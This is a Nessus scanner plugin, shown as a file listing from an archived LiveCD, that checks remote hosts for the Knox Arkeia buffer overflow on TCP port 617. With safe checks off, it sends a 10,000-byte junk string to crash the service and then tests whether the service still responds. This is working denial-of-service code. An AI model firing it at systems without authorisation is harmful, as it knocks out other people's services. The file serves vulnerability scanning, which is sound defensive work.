home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / arkeia.nasl < prev    next >
Text File  |  2005-01-14  |  3KB  |  116 lines
  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6. #
  7. # Found by Brock Tellier <btellier@webley.com>
  8.  
  9. if(description)
  11.  script_id(10018);
  12.  script_bugtraq_id(661);
  13.  script_version ("$Revision: 1.17 $");
  14.  script_cve_id("CAN-1999-1534");
  15.  name["english"] = "Knox Arkeia buffer overflow";
  16.  name["francais"] = "DΘpassement de buffer dans Arkeia de Knox";
  17.  script_name(english:name["english"], francais:name["francais"]);
  18.  
  19.  desc["english"] = "
  20. It was possible to overflow a buffer in the remote Knox's 
  21. Arkeia server.
  22.  
  23. This problem allows an attacker to perform a denial of service 
  24. attack and to gain root remotely on this service.
  25.  
  26. Solution : upgrade to the latest version of Arkeia and/or filter
  27. incoming traffic to TCP port 617.
  28.  
  29. Risk factor : High";
  30.  
  31.  desc["francais"] = "
  32. Il s'est avΘrΘ possible de faire planter le serveur Arkeia
  33. distant.
  34.  
  35. Ce problΦme peut permettre α un pirate de passer root sur
  36. ce systΦme.
  37.  
  38. Solution : mettez α jour Arkeia en sa derniΦre version et/ou
  39. filtrez le traffic entrant vers le port TCP 617.
  40.  
  41. Facteur de risque : ElevΘ";
  42.  
  43.  script_description(english:desc["english"], francais:desc["francais"]);
  44.  
  45.  summary["english"] = "arkeia buffer overflow";
  46.  summary["francais"] = "DΘpassement de buffer dans arkeia";
  47.  script_summary(english:summary["english"], francais:summary["francais"]);
  48.  
  49.  script_category(ACT_MIXED_ATTACK); # mixed
  50.  
  51.  
  52.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  53.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  54.  family["english"] = "Gain root remotely";
  55.  family["francais"] = "Passer root α distance";
  56.  script_family(english:family["english"], francais:family["francais"]);
  57.  script_dependencie("find_service.nes");
  58.  script_require_ports(617);
  59.  exit(0);
  60. }
  61.  
  62. #
  63. # The script code starts here
  64. #
  65.  
  66. include("misc_func.inc");
  67.  
  68. port = 617;
  69. p = known_service(port:port);
  70. if(p && p != "arkeia")exit(0);
  71.  
  72.  
  73. if(safe_checks())
  74. {
  75.  soc = open_sock_tcp(port);
  76.  if(soc)
  77.  {
  78.   close(soc);
  79.   alrt = "
  80. The remote host seems to be running Knox's 
  81. Arkeia server.
  82.  
  83. Some versions of this server come with a buffer overflow
  84. which allow anyone to execute arbitrary commands
  85. as root.
  86.  
  87. *** Nessus reports this vulnerability using only
  88. *** information that was gathered. Use caution
  89. *** when testing without safe checks enabled.
  90.  
  91. Solution : upgrade to the latest version of Arkeia and/or filter
  92. incoming traffic to TCP port 617.
  93.  
  94. Risk factor : High";
  95.  
  96.   security_hole(port:port, data:alrt);
  97.  }
  98.  exit(0);
  99. }
  100.  
  101.  
  102. if(get_port_state(port))
  103. {
  104.  data = crap(10000);
  105.  soc = open_sock_tcp(port);
  106.  if(soc > 0)
  107.  {
  108.   send(socket:soc, data:data);
  109.   close(soc);
  110.   sleep(2);
  111.   soc2 = open_sock_tcp(port);
  112.   if(!soc2)security_hole(port);
  113.   else close(soc2);
  114.  }
  115. }
  116.